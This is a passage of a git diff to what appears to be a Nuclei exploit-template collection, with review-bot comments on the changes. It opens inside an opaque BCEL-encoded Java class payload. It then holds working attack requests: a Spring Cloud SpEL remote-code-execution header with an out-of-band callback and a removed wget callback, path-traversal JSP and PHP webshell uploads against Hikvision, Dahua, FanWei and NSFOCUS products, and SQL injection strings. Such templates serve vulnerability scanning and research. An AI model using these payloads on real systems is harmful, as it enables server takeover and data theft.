c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$
$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - type: word words: - - '{{randstr}}' + - "nt authority\\system" diff --git a/poc/remote_code_execution/spring-functions-rce.yaml b/poc/remote_code_execution/spring-functions-rce.yaml index f28360d6a7..d04177443d 100644 --- a/poc/remote_code_execution/spring-functions-rce.yaml +++ b/poc/remote_code_execution/spring-functions-rce.yaml 
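Review bot: The matcher `"nt authority\\system"` only fires when `whoami` on the target returns the Windows SYSTEM account, while the other Hikvision templates in this commit reference Linux paths (`/opt/hikvision/web/components/tomcat85linux64.1/...`), so a Linux deployment, or a Windows one running under a service account, would never match; that restriction should at least be stated in `description:`. `name: HIKVISION` is a bare vendor name; the description already says what is checked, so e.g. `name: HIKVISION Comprehensive Security Management Platform applyCT Command Execution`. The request body also ships an opaque `$$BCEL$$`-encoded class that nobody can audit from the diff; the commit should record where it came from and what it does, otherwise the repository is distributing an unreviewable executable payload.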
@@ -1,44 +1,46 @@ id: CVE-2022-22963 info: - name: CVE-2022-22963 - Spring Cloud RCE - author: rdnt + name: Spring Cloud - Remote Code Execution + author: Mr-xn,Adam Crosser severity: critical - description: RCE on Spring cloud function SPEL - tags: cve,rce,spring,cve2022,injection + description: | + Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. + reference: + - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f + - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE + - https://tanzu.vmware.com/security/cve-2022-22963 + - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ + - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection + - https://nvd.nist.gov/vuln/detail/CVE-2022-22963 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22963 - cwe-id: CWE-770 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-94 + tags: cve,cve2022,springcloud,rce requests: - - method: POST - path: - - "{{RootURL}}/functionRouter" - - "{{RootURL}}/api/functionRouter" - - "{{RootURL}}/api/v1/functionRouter" - - "{{RootURL}}/../../../../../../functionRouter" - - "{{RootURL}}/../../../../../../;functionRouter" - - "{{RootURL}}/spring/functionRouter" - - "{{RootURL}}/admin/functionRouter" - - "{{RootURL}}/../../../../../../../../functionRouter" - - "{{RootURL}}../../../../../../../../api/functionRouter" - - "{{RootURL}}../../../../../../../../api/v1/functionRouter" - - "{{RootURL}}%2f%2e%2e%2f%2e%2e%2ffunctionRouter" - - 
"{{RootURL}}%2fspring%2ffunctionRouter" - - "{{RootURL}}%2fadmin%2functionRouter" - headers: - spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("") - Content-Type: application/x-www-form-urlencoded - body: exp + - raw: + - | + POST /functionRouter HTTP/1.1 + Host: {{Hostname}} + spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}") + Content-Type: application/x-www-form-urlencoded + + {{rand_base(8)}} matchers-condition: and matchers: - - type: word - part: body - words: - - 'functionRouter' - - type: status - status: - - 500 \ No newline at end of file + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" + condition: or + + - type: status + status: + - 500 + +# Enhanced by mp on 2022/05/19 diff --git a/poc/upload/Dahua_Video_FileUpload.yaml b/poc/upload/Dahua_Video_FileUpload.yaml index 78d89c1465..1af31ba824 100644 --- a/poc/upload/Dahua_Video_FileUpload.yaml +++ b/poc/upload/Dahua_Video_FileUpload.yaml 
@@ -1,29 +1,43 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability + name: Dahua Smart Park Comprehensive Management Platform Video Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability + There is an arbitrary file upload vulnerability in the video interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to upload arbitrary files to the server and control server permissions metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" +http: + - raw: + - | + POST /publishing/publishing/material/file/video HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 804 + Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7 + Accept-Encoding: gzip, deflate + Connection: close + --dd8f988919484abab3816881c55272a7 + Content-Disposition: form-data; name="Filedata"; filename="Test.jsp" -http: - - method: GET - path: - - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" + Test + --dd8f988919484abab3816881c55272a7 + Content-Disposition: form-data; name="Submit" - matchers-condition: and + submit + --dd8f988919484abab3816881c55272a7-- + + req-condition: true matchers: - - type: word - part: body - words: - - "c4ca" + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "success")' + - 'contains(body_1, "path")' + condition: and - - 
type: status - status: - - 500 +# /publishingImg/VIDEO/230812152005170200.jsp diff --git a/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml b/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml index cd961f6e81..538f6fd6d5 100644 --- a/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml +++ b/poc/upload/Hikvision_iVMS-8700_Fileupload_Files.yaml 
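Review bot: The trailing comment `# /publishingImg/VIDEO/230812152005170200.jsp` is left unexplained; if it records where the uploaded file is served from, say so and generalise it (e.g. `# Uploaded file is served from /publishingImg/VIDEO/<timestamp>.jsp`), otherwise it reads as leftover scratch. The matcher accepts any 200 whose body contains both `success` and `path`, which a generic JSON reply could satisfy; an extractor on the returned path would make the result verifiable rather than inferred. The template uploads `Test.jsp` and leaves it on the target, which `description:` should state so operators know the check is not read-only.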
@@ -1,27 +1,35 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Files Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + HiKVISION comprehensive security management platform files interface has an arbitrary file upload vulnerability, allowing attackers to upload arbitrary files through the vulnerability metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /center/api/files;.html HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "test.jsp")' + condition: and diff --git a/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml b/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml index e86e8491d1..cd961f6e81 100644 
--- a/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml +++ b/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml 
@@ -1,40 +1,27 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability - author: Zero Trust Security Attack and Defense Laboratory - severity: high + name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability + author: zerZero Trust Security Attack and Defense Laboratoryo + severity: medium description: | - There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets + There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks metadata: - fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - raw: - - | - POST /svm/api/external/report HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a + - method: GET + path: + - "{{BaseURL}}/artemis-portal/artemis/env" - ------WebKitFormBoundary9PggsiM755PLa54a - Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" - Content-Type: application/zip - - <%out.print("test");%> - - ------WebKitFormBoundary9PggsiM755PLa54a-- - - | - GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_1 == 200' - - 'contains(body_1, "data")' - - 'status_code_2 == 200' - - 'contains(body_2, "test")' - condition: and + 
- type: word + part: body + words: + - "profiles" + + - type: status + status: + - 200 diff --git a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml index 7f081b05e0..7e328a8b1b 100644 --- a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml 
@@ -1,48 +1,50 @@ id: HIKVISION info: - name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file - author: Zero Trust Security Attack and Defense Laboratory + name: HHIKVISION iVMS-8700 upload Webshell file + author: zerZero Trust Security Attack and Defense Laboratory severity: high description: | - HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files + HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file metadata: fofa-query: icon_hash="-911494769" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" variables: - str1: '{{rand_base(6)}}' - str2: '{{rand_base(6)}}' - str3: '<%out.print("{{str2}}");%>' + str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' http: - raw: - | - POST /eps/resourceOperations/upload.action HTTP/1.1 + POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 Host: {{Hostname}} - User-Agent: MicroMessenger - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj - - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj - Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" + User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 184 + Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 + + --c4155aff43901a8b2a19a4641a5efa15 + Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" Content-Type: image/jpeg - {{str3}} - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- + {{randstr}} + --c4155aff43901a8b2a19a4641a5efa15-- - | - GET /eps/upload/{{res_id}}.jsp HTTP/1.1 + GET /eps/upload/{{name}}.jsp HTTP/1.1 Host: {{Hostname}} extractors: - type: json - name: res_id + name: name json: - 
".data.resourceUuid" internal: true matchers: - - type: dsl - dsl: - - body_2 == str2 + - type: word + words: + - '{{randstr}}' diff --git a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml index b35ef84818..a8f9cbe173 100644 --- a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml +++ b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml 
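Review bot: The new word matcher `'{{randstr}}'` is no longer tied to the second response: the `req-condition: true` that scoped the old dsl matcher to `body_2` is gone, so the match is evaluated per response and the template no longer asserts a 200 on the retrieval request. Keeping `req-condition: true` on the raw block with a dsl entry `- 'status_code_2 == 200 && contains(body_2, "{{randstr}}")'` restores that scoping. `Content-Length: 184` is hard-coded while the body length depends on the `{{randstr}}` expansion; if the engine does not recompute it, the declared length will be wrong. The metadata also regressed — `name: HHIKVISION …`, `author: zerZero …` and `Platfor` in the description are typos — and the description should state that a successful run leaves an uploaded `.jsp` on the target at the extracted `{{name}}` path, a side effect operators need to know about when cleaning up after a scan.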
@@ -1,49 +1,59 @@ id: Green-Alliance info: - name: Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability + name: Green Alliance NF Next Generation Firewall Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability + Green Alliance SSL VPN has an arbitrary file upload vulnerability, allowing attackers to obtain server privileges and execute remote commands by sending special request packets metadata: - fofa-query: body="'/needUsbkey.php?username='" - hunter-query: web.body="'/needUsbkey.php?username='" + fofa-query: app="NSFOCUS-下一代防火墙" + hunter-query: web.title="用户认证 - NSFOCUS NF" + http: - - method: GET - path: - - "{{BaseURL}}/webconf/Exec/index?cmd=id" + - raw: + - | + POST /api/v1/device/bugsInfo HTTP/1.1 + Host: {{Host}}:8081 + Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 238 + Accept-Encoding: gzip, deflate + Connection: close + + --1d52ba2a11ad8a915eddab1a0e85acd9 + Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac72" + + lang|s:52:"../../../../../../../../../../../../../../../../tmp/"; + --1d52ba2a11ad8a915eddab1a0e85acd9-- + + - | + POST /api/v1/device/bugsInfo HTTP/1.1 + Host: {{Host}}:8081 + Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 217 + Accept-Encoding: gzip, deflate + Connection: close + + --4803b59d015026999b45993b1245f0ef + Content-Disposition: form-data; name="file"; filename="compose.php" + + + --4803b59d015026999b45993b1245f0ef-- + + - | + GET /mail/include/header_main.php HTTP/1.1 + 
Host: {{Host}}:4433 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac72 - matchers-condition: and matchers: - - type: word - part: body - words: - - "200" - - - type: status - status: - - 200 - - -# http: -# - method: GET -# path: -# - "{{BaseURL}}/webconf/Exec/index?cmd=wget%20{{interactsh-url}}" - -# attack: clusterbomb -# matchers-condition: or -# matchers: -# - type: word -# part: interactsh_protocol -# name: http -# words: -# - "http" - -# - type: word -# part: interactsh_protocol -# name: dns -# words: -# - "dns" + - type: dsl + dsl: + - "status_code_1 == 200 && contains(body_1, 'upload file success')" + - "status_code_2 == 200 && contains(body_2, 'upload file success')" + - "status_code_3 == 200 && contains(body_3, '{{randstr}}')" + condition: and diff --git a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml index aa02a4941d..8c93d2bd55 100644 --- a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml +++ b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml 
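Review bot: The third dsl clause `contains(body_3, '{{randstr}}')` can never be true, because none of the three requests in this hunk sends `{{randstr}}` — the compose.php part is empty — so with `condition: and` the template only ever reports negatives. The clause should check an indicator the third response actually carries, or be dropped, and the result re-verified against a known-vulnerable and a patched host. The `Host: {{Host}}:8081` and `{{Host}}:4433` headers only label the requests; as far as the hunk shows, each raw request goes to the scan input, so both ports cannot be reached from one target unless the engine routes by Host header — a comment stating which port the input must point at would prevent silent misfires. The description ("Green Alliance SSL VPN has an arbitrary file upload vulnerability …") contradicts the name and queries, which say NF next-generation firewall, and the hard-coded `Content-Length: 238`/`217` values carry the usual recompute caveat for raw templates.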
@@ -1,52 +1,39 @@ id: FanWei info: - name: FanWei Micro OA E-Office upload.php Arbitrary File Upload Vulnerability + name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei E-Office uploads files in upload.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability + The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: fofa-query: app="泛微-EOffice" hunter-query: web.title="泛微软件" - -variables: - str1: '{{rand_base(6)}}' - str2: '{{rand_base(6)}}' - http: - raw: - | - POST /webservice/upload.php HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl - Accept-Encoding: gzip - Connection: close + POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + Connection: close + Content-Length: 259 + Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 + Accept-Encoding: gzip - ------WebKitFormBoundaryakbyiukl - Content-Disposition: form-data; name="file"; filename="a.php4" - Content-Type: application/octet-stream + --e64bdf16c554bbc109cecef6451c26a4 + Content-Disposition: form-data; name="Filedata"; filename="test.php" + Content-Type: image/jpeg - - ------WebKitFormBoundaryakbyiukl-- + - - | - GET /attachment/{{replace(name,"*","/")}}.php4 HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: regex - name: name - group: 1 - regex: - - '([/*0-9a-zA-Z]+)\.php4$' - 
internal: true + --e64bdf16c554bbc109cecef6451c26a4-- + req-condition: true matchers: - type: dsl dsl: - - body_2 == str2 - -# http://your-ip/attachment/回显的那串数字/a.php4 + - 'status_code_1 == 200 && len(body) > 0' + condition: and + +# /attachment/3466744850/xxx.php diff --git a/poc/upload/ecology_E-Office_upload.yaml b/poc/upload/ecology_E-Office_upload.yaml index aa02a4941d..4e7ede529c 100644 --- a/poc/upload/ecology_E-Office_upload.yaml +++ b/poc/upload/ecology_E-Office_upload.yaml 
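Review bot: The dsl `'status_code_1 == 200 && len(body) > 0'` mixes the indexed form required under `req-condition: true` with an un-indexed `body`, and even as `len(body_1) > 0` it accepts any non-empty 200 — an HTML error page or the uploadify form itself would match — so the template no longer verifies that an upload happened. Match on a token the upload response actually returns, or restore a second request that retrieves the stored file as the removed extractor did. `id: FanWei` is shared with the ecology_E-Office_upload.yaml hunk in this commit; template ids are expected to be unique, so duplicates are likely to be reported or collapsed by the engine — give each a descriptive id. In the description, "The pan micro OA E-Office" is a literal translation of the vendor name; `FanWei E-Office uploads files in uploadify.php without strict filtering, …` matches the name line. The trailing `# /attachment/3466744850/xxx.php` comment is an unexplained leftover; either say what it documents (for example, the path pattern of a stored file) or remove it.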
@@ -1,52 +1,29 @@ id: FanWei + info: - name: FanWei Micro OA E-Office upload.php Arbitrary File Upload Vulnerability + name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei E-Office uploads files in upload.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability + FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- metadata: - fofa-query: app="泛微-EOffice" - hunter-query: web.title="泛微软件" - + fofa-query: app="泛微-协同办公OA" + hunter-query: web.title="泛微-协同办公OA" -variables: - str1: '{{rand_base(6)}}' - str2: '{{rand_base(6)}}' http: - raw: - | - POST /webservice/upload.php HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl - Accept-Encoding: gzip - Connection: close - - ------WebKitFormBoundaryakbyiukl - Content-Disposition: form-data; name="file"; filename="a.php4" - Content-Type: application/octet-stream - - - ------WebKitFormBoundaryakbyiukl-- - - - | - GET /attachment/{{replace(name,"*","/")}}.php4 HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: regex - name: name - group: 1 - regex: - - '([/*0-9a-zA-Z]+)\.php4$' - internal: true + GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) + Accept-Encoding: gzip, deflate + Connection: close + req-condition: true matchers: - type: dsl dsl: - - body_2 == str2 - -# http://your-ip/attachment/回显的那串数字/a.php4 + - 'contains(body_1, "c4ca")' + 
condition: and diff --git a/poc/wordpress/wp-events-manager.yaml b/poc/wordpress/wp-events-manager.yaml new file mode 100644 index 0000000000..6f6bb9a48b --- /dev/null +++ b/poc/wordpress/wp-events-manager.yaml @@ -0,0 +1,59 @@ +id: wp-events-manager + +info: + name: > + WP Events Manager <= 2.1.11 - Authenticated (Subscriber+) Time-Based SQL Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/88dc08ff-3966-4606-855c-57c25552599e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-events-manager/" + google-query: inurl:"/wp-content/plugins/wp-events-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-events-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-events-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + 